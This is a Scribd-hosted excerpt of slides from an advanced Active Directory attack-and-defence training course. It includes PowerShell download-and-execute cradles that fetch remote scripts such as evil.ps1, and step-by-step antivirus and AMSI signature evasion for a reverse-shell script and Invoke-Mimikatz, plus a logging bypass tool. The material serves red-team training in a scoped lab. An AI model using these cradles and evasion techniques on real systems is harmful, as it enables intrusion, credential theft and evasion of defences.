Scribd
Upload
74 views380 pages

AD Advanced Notes

Uploaded by

eshensanjula2002
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
74 views380 pages

AD Advanced Notes

Uploaded by

eshensanjula2002
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 380

Cyber Bank

https://t.me/CyberBankSa
https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Attacking and Defending Active Directory -


Advanced Edition

Powered by INE: https://ine.com/


Altered Security: https://alteredsecurity.com/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 1


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

About me
• Twitter - @chiragsavla94
• Career - Senior Security Researcher at Altered Security
• Blog - https://3xpl01tc0d3r.blogspot.com/
• GitHub - https://github.com/3xpl01tc0d3r
• Creator of Open Source tools such as Process Injection, Callidus, etc.
• Interested in Offensive side of security such as penetration testing, red
teaming, azure, active directory security, and post-exploitation research.
• Spoken at multiple conferences and local meetups.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 2

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 2


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Course Content
• Introduction to Active Directory
• Introduction to Attack methodology and tradecraft
• Domain Enumeration (Attacks and Defense)
• Enumerating information that would be useful in attacks with leaving minimal
footprint on the endpoints
• Understand and practice what properties and information to look for when
preparing attack paths to avoid detection
• Enumerate trust relationships within and across forests to map cross trust attack
paths
• Learn and practice escalating to local administrator privileges in the domain by
abusing OU Delegation, Restricted Groups, LAPS, Nested group membership and
hunting for privileges using remote access protocols
• Credential Replay Attacks

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 3

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 3


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Course Content
• Evading application whitelisting (WDAC)
• Domain Privilege Escalation by abusing Unconstrained Delegation.
Understand how unconstrained delegation is useful in compromising
multiple high privilege servers and users in AD
• Abusing Constrained Delegation for Domain Privilege Escalation by
impersonating high privilege accounts
• Using ACL permissions to abuse Resource-based Constrained Delegation
• Domain Persistence Techniques

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 4

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 4


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Course Content
• Advanced Cross Domain attacks. Learn and practice attacks that allow
escalation from Domain Admins to Enterprise Admins by abusing MS
Products and delegation issues.
• User / Computer account take over by leveraging Shadow Credentials.
• Lateral movement from on-prem to Azure AD by attacking Hybrid
Identity infrastructure.
• Advanced Cross Forest attacks. Execute attacks like abuse of Kerberoast,
SID Filtering misconfigurations etc. across forest trusts forests and
understand the nuances of such attacks.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 5

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 5


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Course Content
• Abusing SQL Server for cross forest attacks
• More on advanced Cross Forest attacks like abuse of Foreign Security
Principals, ACLs etc.
• Abusing PAM trust and shadow security principals to execute attacks
against a managed forests.
• Detections and Defenses (Red Forest, JEA, PAW, LAPS, Selective Auth,
Deception, App Whitelisting, MDI, Tiered Administration)
• Bypassing defenses like Advanced Threat Analytics, Protected Users
Group, WDAC etc.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 6

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 6


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Goal
• The training expects knowledge of Active Directory security and familiarity
with Windows command line.
• This course introduces a concept, demonstrates how an attack can be
executed and then have Learning Objective section where students can
practice in the lab.
• The lab, like a real world red team operation, forces you to use built-in tools
as long as possible and focus on functionality abuse. So, in this course, we will
NOT use any exploits and exploitation framework.
• We start from a foothold box as a normal domain user.
• Everything is not in the slides :)

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 7

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 7


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Word of Caution
• In scope:
– 192.168.1.0/24 – 192.168.102.0/24, 192.168.100.X
– 192.168.1.199-192.168.1.200 are NOT in scope.
• Everything else is NOT in scope.
• Attacking out of scope machines may result in disqualification from the
class.
• Please treat the lab network as a dangerous environment and take care
of yourself!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 8

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 8


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Philosophy of the course


• We will emulate an adversary who has a foothold machine in the target
domain.
• We will not use any exploit in the class but will depend on abuse of
functionality and features with are rarely patched.
• We try to use the built-in tools and avoid touching disk as long as
possible. We will not use any exploitation framework in the class.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 9

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 9


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Active Directory
• Directory Service used to managed Windows networks.
• Stores information about objects on the network and makes it easily
available to users and admins.
• "Active Directory Domain Services (AD DS) enables centralized, secure
management of an entire network, which might span a building, a city
or multiple locations throughout the world."
https://docs.microsoft.com/en-us/previous-versions/windows/it-
pro/windows-server-2003/cc780036(v=ws.10)

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 10

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 10


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 11

https://technet.microsoft.com/en-us/library/cc780036(v=ws.10).aspx

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 11


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Active Directory - Components


• Schema – Defines objects and their attributes.
• Query and index mechanism – Provides searching and publication of
objects and their properties.
• Global Catalog – Contains information about every object in the
directory.
• Replication Service – Distributes information across domain controllers.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 12

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 12


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Active Directory - Structure


• Forests, domains and organization units (OUs) are the basic building
blocks of any active directory structure.

• A forest – which is a
security boundary –
may contain multiple
domains and each
domain may contain
multiple OUs.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 13

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 13


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Attacking Active Directory


• In the class, we are going to abuse AD components and trusts and will
not rely on ANY patchable exploits.
• No Unix or Linux tools or OS will be used which increases our stealth
and flexibility.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 14

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 14


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Tools
• C/C++/C# - Public code
• PowerShell - Built-in cmdlets, Microsoft Signed Modules, PowerShell
Remoting, Public scripts and Custom scripts.
• Windows native executables

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 15

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 15


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 16


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

PowerShell Script Execution


• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 18

Check out Invoke-CradleCrafter:


https://github.com/danielbohannon/Invoke-CradleCrafter

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 18


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

PowerShell and AD
• [ADSI]
• .NET Classes
System.DirectoryServices.ActiveDirectory
• Native Executable
• WMI using PowerShell
• ActiveDirectory Module

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 19

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 19


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

PowerShell Detections
• System-wide transcription
• Script Block logging
• AntiMalware Scan Interface (AMSI)
• Constrained Language Mode (CLM) - Integrated with Applocker and
WDAC (Device Guard)

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 20

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 20


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

15 ways to bypass PowerShell execution policy


https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-
execution-policy

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 21


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

PowerShell Tradecraft
• Offensive PowerShell is not dead.
• The detections depend on your target organization and if you are using
customized code.
• There are bypasses and then there are obfuscated bypasses!
• Remember, the focus of the class is Active Directory :)

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 22

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 22


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing PowerShell Security


• We will use Invisi-Shell (https://github.com/OmerYa/Invisi-Shell) for
bypassing the security controls in PowerShell.
• The tool hooks the .NET assemblies
(System.Management.Automation.dll and System.Core.dll) to bypass
logging
• It uses a CLR Profiler API to perform the hook.
• "A common language runtime (CLR) profiler is a dynamic link library
(DLL) that consists of functions that receive messages from, and send
messages to, the CLR by using the profiling API. The profiler DLL is
loaded by the CLR at run time."

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 23

https://github.com/OmerYa/Invisi-
Shell/blob/master/InvisiShellProfier/InvisiShellProfiler.cpp
https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-
api/profiling/profiling-overview

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 23


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing PowerShell Security


Using Invisi-Shell
• With admin privileges:
RunWithPathAsAdmin.bat

• With non-admin privileges:


RunWithRegistryNonAdmin.bat

• Type exit from the new PowerShell session to complete the clean-up.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 24

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 24


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell


• We can always load scripts in memory and avoid detection using AMSI bypass.
• How do we bypass signature based detection of on-disk PowerShell scripts by Windows Defender?
• We can use the AMSITrigger (https://github.com/RythmStick/AMSITrigger) tool to identify the exact
part of a script that is detected by AMSI.
• We can use DefenderCheck (https://github.com/t3hbb/DefenderCheck) to identify code and strings
from a binary / file that Windows Defender may flag.
• Simply provide path to the script file to scan it:
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1
• For full obfuscation of PowerShell scripts, see Invoke-Obfuscation
(https://github.com/danielbohannon/Invoke-Obfuscation). That is used for obfuscating the AMSI
bypass in the course!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 25

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 25


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell


• Steps to avoid signature based detection are pretty simple:
1) Scan using AMSITrigger
2) Modify the detected code snippet
3) Rescan using AMSITrigger
4) Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or
“Blank”

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 26

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 26


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - PowerUp


• Scan using AMSITrigger

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 27

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 27


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - PowerUp


• Reverse the "System.AppDomain" string on line number 59
$String = 'niamoDppA.metsyS’
$classrev = ([regex]::Matches($String,'.','RightToLeft') | ForEach
{$_.value}) -join ‘’
$AppDomain =
[Reflection.Assembly].Assembly.GetType("$classrev").GetProperty('Cur
rentDomain').GetValue($null, @())
• Check again with AMSITrigger

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 28

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 28


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - PowerUp


• Scan using DefenderCheck

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 29

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 29


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - PowerUp


• Reverse the value of variables “$DllBytes32” & “$DllBytes64”

• Rescan using DefenderCheck

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 30

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 30


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - Invoke-


PowerShellTcp
• Scan using AMSITrigger

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 31

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 31


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - Invoke-


PowerShellTcp
• Reverse the "Net.Sockets" string on line number 32
$String = "stekcoS.teN"
$class = ([regex]::Matches($String,'.','RightToLeft') | ForEach
{$_.value}) -join ''
if ($Reverse)
{
$client = New-Object System.$class.TCPClient($IPAddress,$Port)
}
• Check again with AMSITrigger!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 32

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 32


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - Invoke-


Mimikatz
• Invoke-Mimikatz is THE most heavily signature PowerShell script!
• We must rename it before scanning with AmsiTrigger or we get an access denied.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 33

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 33


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - Invoke-


Mimikatz
• There are multiple detections. We need to make the following changes:
1) Remove the comments.
2) Modify each use of "DumpCreds".
3) Modify the variable names of the Win32 API calls that are detected.
4) Reverse the strings that are detected and the Mimikatz Compressed
DLL string.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 34

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 34


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - Invoke-


Mimikatz
2. Modify each use of "DumpCreds". We changed it to "DC"

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 35

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 35


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - Invoke-


Mimikatz
3. Modify the variable names of the Win32 API calls that are detected -
"VirtualProtect", WriteProcessMemory" and "CreateRemoteThread"

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 36

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 36


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing AV Signatures for PowerShell - Invoke-


Mimikatz
4. Reverse the strings that are detected and the Mimikatz Compressed DLL
string.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 37

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 37


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Methodology - Assume Breach

"It is more likely that an organization has already been compromised, but just
hasn't discovered it yet."

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 38

Microsoft Cloud Red Teaming Paper: https://gallery.technet.microsoft.com/Cloud-


Red-Teaming-b837392

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 38


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Insider Attack Simulation

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 39

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 39


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The Lab Environment


• We target the Active Directory environment of a fictional critical tech
company called 'Techcorp'.
• Techcorp has segregated their AD in multiple forests across departments,
locations and vendors. It has
– (Almost) fully patched Server 2019 machines.
– Server 2016 Forest Functional Level (There is nothing called Server 2019
Forest Functional Level).
– Multiple forests and multiple domains.
– Minimal firewall usage so that we focus more on concepts.
• On student machines, you can find all the tools in C:\AD directory. It is
exempted from Windows Defender.
INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 40

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 40


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 41

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 41


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Domain Enumeration
• For enumeration we can use the following tools
− The ActiveDirectory PowerShell module (MS signed and works even in PowerShell CLM)
https://docs.microsoft.com/en-us/powershell/module/addsadministration/?view=win10-ps
https://github.com/samratashok/ADModule

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

− BloodHound (C# and PowerShell Collectors)


https://github.com/BloodHoundAD/BloodHound

− PowerView (PowerShell)
https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1

. C:\AD\Tools\PowerView.ps1

− SharpView (C#) - Doesn't support filtering using Pipeline


https://github.com/tevora-threat/SharpView/
INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 42

https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-
without-installing-the-remote-server-tools/
https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-
PowerShell-CLM.html

